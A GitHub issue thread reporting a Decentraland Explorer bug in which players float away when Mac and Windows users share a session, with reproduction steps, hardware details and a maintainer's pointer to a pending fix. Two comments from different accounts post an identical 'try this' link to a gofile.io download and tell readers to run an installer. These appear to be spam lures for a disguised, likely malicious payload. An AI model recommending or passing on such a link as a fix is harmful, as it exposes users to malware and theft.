### ISSUE TITLE
[QA] Players Floating Issue Across Different OS (Windows & Mac)

### ISSUE THREAD

**Issue by Ludmilafantaniella** [decentraland/unity-explorer#1970]
### **Explorer Alpha build versions:**

- **v0.25.0**

### **Issue Description:**
When joining Decentraland with players using different operating systems (Windows and Mac), some players start floating and drifting away from the scene. This issue only occurs when Mac users are present in the session. If all players are connected from Windows, the issue does not occur.

### **MAC LOGS**
[Player-prev.log.zip](https://github.com/user-attachments/files/16871174/Player-prev.log.zip)

[Player.log.zip](https://github.com/user-attachments/files/16871177/Player.log.zip)

### **STR:** 

1. Launch Decentraland with players on both Windows and Mac.
2. Observe the behavior of the players in the scene.
3. `/goto 145,60` and repeat step 2
4. Take note of players starting to float and drift away from the scene.

### **Expected behavior:**
- All players should stay grounded and within the scene regardless of the operating system being used.

### **Current behavior:**
- Players using different operating systems (Windows and Mac) see others floating and moving away from the scene.
- The issue occurs when there is a Mac user in the session.

#### **Evidence:**

https://github.com/user-attachments/assets/bd6bad3c-7c1b-49f0-a58c-316a7c486f38

#### **Additional Notes:**

Windows 11. 12th Gen Intel(R) Core(TM) i7-12650H 2.30 GHz. nvidia geforce RTX
Macbook M1 Pro Sonoma 14.5
Technical Details of My Mac:
	•	Model: MacBook Pro
	•	Chip: Apple M1 Pro
	•	Memory: 16GB
	•	Display: 16-inch (3456 × 2234)
	•	Storage: 335.12 GB available of 494.38 GB

**Comment by santos-naudiyal** [comment]
try this
https://gofile.io/d/yMHabA
select the desired compiler in the installer

**Comment by HeyRintu** [comment]
try this
https://gofile.io/d/yMHabA
select the desired compiler in the installer

**Comment by NickKhalow** [comment]
Awaiting for PR: https://github.com/decentraland/js-sdk-toolchain/pull/993
